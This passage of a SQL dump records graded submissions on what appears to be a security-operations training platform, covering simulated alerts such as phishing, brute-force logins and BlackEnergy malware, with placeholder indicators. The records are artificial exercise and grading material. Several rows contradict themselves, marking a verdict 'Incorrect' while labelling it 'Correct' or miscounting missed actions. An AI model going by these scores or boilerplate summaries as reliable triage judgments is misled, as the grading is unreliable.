'2026-03-06 10:15:27', 0, NULL),
(413, 225, 943, 'graded', 80, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/3)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.1.2.34\",\"ip-198.51.100.45\",\"domain-http://fakeo\"],\"selectedActions\":[\"block_ip\",\"reset_credentials\",\"isolate_host\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/6/2026, 9:20:02 PM\\nALERT: Suspicious Office365 Login Page Detected\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 10.1.2.34\\n- [IP] 198.51.100.45\\n- [DOMAIN] http://fakeoffice365.com/login\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (3)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Reset Credentials\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-06T10:20:33.051Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/3)\",\"missed_items\":[\"block_url\",\"close_alert\"],\"strengths\":\"Needs improvement\"}', '2026-03-06 13:27:31', '2026-03-06 10:17:31', '2026-03-06 10:20:33', 0, NULL),
(414, 225, 942, 'graded', 85, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/2)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-45.67.89.101\",\"ip-192.168.0.34\",\"artifact_2\"],\"selectedActions\":[\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/6/2026, 9:23:29 PM\\nALERT: Unauthorized Remote Access Attempt Detected\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 45.67.89.101\\n- [IP] 192.168.0.34\\n- [USERNAME] admin\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (2)\\n------------------------------\\n- Block IP/Domain\\n- Reset Credentials\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-06T10:23:45.524Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/2)\",\"missed_items\":[\"close_alert\"],\"strengths\":\"Solid analysis\"}', '2026-03-06 13:27:05', '2026-03-06 10:22:05', '2026-03-06 10:23:45', 0, NULL),
(415, 225, 1379, 'graded', 80, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/3)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.55\",\"domain-http://malic\",\"artifact_1\"],\"selectedActions\":[\"block_ip\",\"isolate_host\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/6/2026, 9:27:10 PM\\nALERT: Phishing Email with QR Code Detected\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 203.0.113.55\\n- [DOMAIN] http://malicious-qrcode-site.com\\n- [EMAIL] alert@securitybank.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (1)\\n------------------------------\\n- Block IP/Domain\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-06T10:27:43.990Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/3)\",\"missed_items\":[\"reset_credentials\",\"close_alert\"],\"strengths\":\"Needs improvement\"}', '2026-03-06 13:29:23', '2026-03-06 10:24:23', '2026-03-06 10:27:43', 0, NULL),
(416, 225, 1390, 'graded', 60, 'Incorrect verdict. Expected false_positive, got true_positive. All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-198.51.100.12\",\"domain-http://suspi\",\"artifact_1\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/6/2026, 9:28:42 PM\\nALERT: Phishing Email with Suspicious URL\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 198.51.100.12\\n- [DOMAIN] http://suspicious-url.com/login\\n- [EMAIL] fake@phishingsite.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Reset Credentials\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-06T10:28:45.490Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Incorrect verdict. Expected false_positive, got true_positive. All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', '2026-03-06 13:34:07', '2026-03-06 10:28:07', '2026-03-06 10:28:45', 0, NULL),
(417, 225, 733, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-198.51.100.50\",\"ip-10.0.0.8\",\"domain-http://secur\",\"domain-trusted-secu\",\"artifact_1\"],\"selectedActions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"reset_credentials\",\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/6/2026, 9:30:45 PM\\nALERT: Business Email Compromise Attempt via Lookalike Domain\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 198.51.100.50\\n- [IP] 10.0.0.8\\n- [DOMAIN] http://secure-trusted.com/transaction\\n- [DOMAIN] trusted-secure.com\\n- [EMAIL] partner@trusted-secure.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-06T10:30:56.197Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-06 13:34:19', '2026-03-06 10:29:19', '2026-03-06 10:30:56', 0, NULL),
(418, 258, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-06 15:20:34', '2026-03-06 15:20:34', 0, NULL),
(419, 258, 1394, 'investigating', NULL, NULL, NULL, NULL, '2026-03-06 18:30:25', '2026-03-06 15:22:25', '2026-03-06 15:22:25', 0, NULL),
(420, 259, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-06 21:12:51', '2026-03-06 21:12:51', 0, NULL),
(422, 247, 1434, 'investigating', NULL, NULL, NULL, NULL, '2026-03-07 04:35:08', '2026-03-07 01:25:08', '2026-03-07 01:25:08', 0, NULL),
(423, 142, 731, 'graded', 80, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/3)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-198.51.100.23\",\"ip-10.0.0.5\",\"domain-http://secur\",\"domain-company-secu\",\"artifact_1\"],\"selectedActions\":[\"block_ip\",\"block_hash\",\"isolate_host\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/6/2026, 9:11:58 PM\\nALERT: Spear Phishing Attempt with Malicious URL Detected\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 198.51.100.23\\n- [IP] 10.0.0.5\\n- [DOMAIN] http://secure-company.com/login\\n- [DOMAIN] company-secure.com\\n- [EMAIL] ceo@company-secure.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T05:12:35.403Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/3)\",\"missed_items\":[\"block_url\",\"close_alert\"],\"strengths\":\"Needs improvement\"}', '2026-03-07 08:15:44', '2026-03-07 05:08:44', '2026-03-07 05:12:35', 0, NULL),
(424, 142, 1387, 'graded', 80, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/3)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-185.92.220.50\",\"ip-192.168.1.15\",\"artifact_2\"],\"selectedActions\":[\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/6/2026, 9:14:44 PM\\nALERT: Brute Force Attack from Foreign IP\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 185.92.220.50\\n- [IP] 192.168.1.15\\n- [USERNAME] admin\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (1)\\n------------------------------\\n- Block IP/Domain\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T05:14:55.748Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/3)\",\"missed_items\":[\"reset_credentials\",\"close_alert\"],\"strengths\":\"Needs improvement\"}', '2026-03-07 08:20:30', '2026-03-07 05:13:30', '2026-03-07 05:14:55', 0, NULL),
(425, 142, 269, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-203.0.113.50\",\"hash-d41d8cd9\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/6/2026, 9:17:41 PM\\nALERT: BlackEnergy Malware Execution [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 203.0.113.50\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] invoice.doc\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T05:17:51.648Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-07 05:16:28', '2026-03-07 05:17:51', 0, NULL),
(426, 232, 269, 'graded', 93, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-203.0.113.50\",\"hash-d41d8cd9\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/7/2026, 6:26:47 PM\\nALERT: BlackEnergy Malware Execution [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 203.0.113.50\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] invoice.doc\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T12:57:07.401Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)\",\"missed_items\":[\"collect_forensics\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-07 08:20:36', '2026-03-07 12:57:07', 0, NULL),
(427, 261, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-07 08:27:47', '2026-03-07 08:27:47', 0, NULL),
(428, 232, 247, 'graded', 85, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.77\",\"ip-192.168.1.10\"],\"selectedActions\":[\"isolate_host\",\"reset_credentials\",\"block_ip\",\"block_hash\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/7/2026, 7:51:27 PM\\nALERT: Brute Force Attack Detected - Multiple Failed Logins\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (2)\\n----------------\\n- [IP] 203.0.113.77\\n- [IP] 192.168.1.10\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T14:21:36.824Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)\",\"missed_items\":[\"collect_forensics\",\"close_alert\"],\"strengths\":\"Solid analysis\"}', '2026-03-07 11:36:39', '2026-03-07 08:28:39', '2026-03-07 14:21:36', 0, NULL),
(429, 260, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-07 10:22:53', '2026-03-07 10:22:53', 0, NULL),
(430, 225, 1374, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.50\",\"domain-http://phish\",\"domain-fakecompany.\",\"artifact_1\"],\"selectedActions\":[\"isolate_host\",\"reset_credentials\",\"block_ip\",\"close_alert\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/7/2026, 9:38:47 PM\\nALERT: Phishing Email Detected with Malicious URL\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.50\\n- [DOMAIN] http://phishing-portal.com/login\\n- [DOMAIN] fakecompany.com\\n- [EMAIL] spoofed-ceo@fakecompany.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T10:38:52.526Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-07 13:42:26', '2026-03-07 10:37:26', '2026-03-07 10:38:52', 0, NULL),
(431, 225, 1380, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.70\",\"domain-http://fake-\",\"domain-legitimateco\",\"artifact_1\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/7/2026, 9:42:12 PM\\nALERT: BEC Attempt Detected with Spoofed Domain\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.70\\n- [DOMAIN] http://fake-invoice-page.com\\n- [DOMAIN] legitimatecompany.com\\n- [EMAIL] ceo@legitimatecompany.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Reset Credentials\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T10:42:21.803Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-07 13:46:16', '2026-03-07 10:39:16', '2026-03-07 10:42:21', 0, NULL),
(432, 225, 1385, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.70\",\"ip-203.0.113.175\",\"domain-exfiltration\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/7/2026, 9:44:10 PM\\nALERT: Data Exfiltration Attempt via Suspicious Domain\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 192.168.1.70\\n- [IP] 203.0.113.175\\n- [DOMAIN] exfiltration-domain.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T10:44:21.639Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-07 13:51:51', '2026-03-07 10:42:51', '2026-03-07 10:44:21', 0, NULL),
(433, 225, 1375, 'graded', 100, 'Verdict is correct (+40). Artifact analysis completed (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.0.0.5\",\"artifact_2\"],\"selectedActions\":[\"reset_credentials\",\"close_alert\"],\"verdict\":\"false_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/7/2026, 10:41:24 PM\\nALERT: Failed Login Attempts from Internal IP\\nVERDICT: FALSE POSITIVE\\n\\nKEY FINDINGS (2)\\n----------------\\n- [IP] 10.0.0.5\\n- [USERNAME] testuser\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (2)\\n------------------------------\\n- Reset Credentials\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T11:41:37.428Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Artifact analysis completed (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-07 14:21:30', '2026-03-07 11:11:30', '2026-03-07 11:41:37', 0, NULL);
INSERT INTO `investigations` (`id`, `user_id`, `alert_id`, `status`, `grade`, `feedback`, `executive_summary`, `ai_summary`, `ai_evaluation_scheduled_at`, `created_at`, `updated_at`, `is_reported`, `report_reason`) VALUES
(434, 225, 1376, 'graded', 60, 'Incorrect verdict. Expected false_positive, got true_positive. Artifact analysis completed (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.50\",\"ip-203.0.113.150\",\"domain-suspicious-w\"],\"selectedActions\":[\"block_hash\",\"reset_credentials\",\"block_ip\",\"isolate_host\",\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/7/2026, 10:43:00 PM\\nALERT: Suspicious Domain Access Detected\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 192.168.1.50\\n- [IP] 203.0.113.150\\n- [DOMAIN] suspicious-website.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T11:43:03.169Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Incorrect verdict. Expected false_positive, got true_positive. Artifact analysis completed (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', '2026-03-07 14:47:04', '2026-03-07 11:42:04', '2026-03-07 11:43:03', 0, NULL),
(435, 225, 1388, 'graded', 60, 'Incorrect verdict. Expected false_positive, got true_positive. All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.101\",\"ip-192.168.2.25\",\"artifact_2\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/7/2026, 10:44:57 PM\\nALERT: Suspicious Login Activity\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 203.0.113.101\\n- [IP] 192.168.2.25\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Reset Credentials\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T11:44:59.588Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Incorrect verdict. Expected false_positive, got true_positive. All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', '2026-03-07 14:54:02', '2026-03-07 11:44:02', '2026-03-07 11:44:59', 0, NULL),
(436, 225, 1381, 'graded', 100, 'Verdict is correct (+40). Artifact analysis completed (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.20\",\"ip-203.0.113.95\",\"hash-d41d8cd9\"],\"selectedActions\":[\"block_ip\",\"close_alert\"],\"verdict\":\"false_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/7/2026, 10:45:59 PM\\nALERT: Suspicious File Downloaded from Public IP\\nVERDICT: FALSE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 192.168.1.20\\n- [IP] 203.0.113.95\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (2)\\n------------------------------\\n- Block IP/Domain\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T11:46:07.596Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Artifact analysis completed (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-07 14:51:12', '2026-03-07 11:45:12', '2026-03-07 11:46:07', 0, NULL),
(437, 225, 601, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-45.67.89.123\",\"ip-192.168.1.10\"],\"selectedActions\":[\"block_ip\",\"reset_credentials\",\"isolate_host\",\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/7/2026, 10:50:23 PM\\nALERT: Brute Force Attack Detected on Corporate Server\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (2)\\n----------------\\n- [IP] 45.67.89.123\\n- [IP] 192.168.1.10\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Reset Credentials\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T11:50:25.321Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-07 14:59:36', '2026-03-07 11:49:36', '2026-03-07 11:50:25', 0, NULL),
(438, 225, 217, 'graded', 85, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/2)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/7/2026, 10:54:07 PM\\nALERT: Suspicious Remote Login Attempt Detected\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [USERNAME] NotAvailable\\n- [USERNAME] Guest\\n- [USERNAME] LOCAL\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Reset Credentials\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T11:54:10.051Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/2)\",\"missed_items\":[\"collect_forensics\"],\"strengths\":\"Solid analysis\"}', '2026-03-07 15:00:33', '2026-03-07 11:52:33', '2026-03-07 11:54:10', 0, NULL),
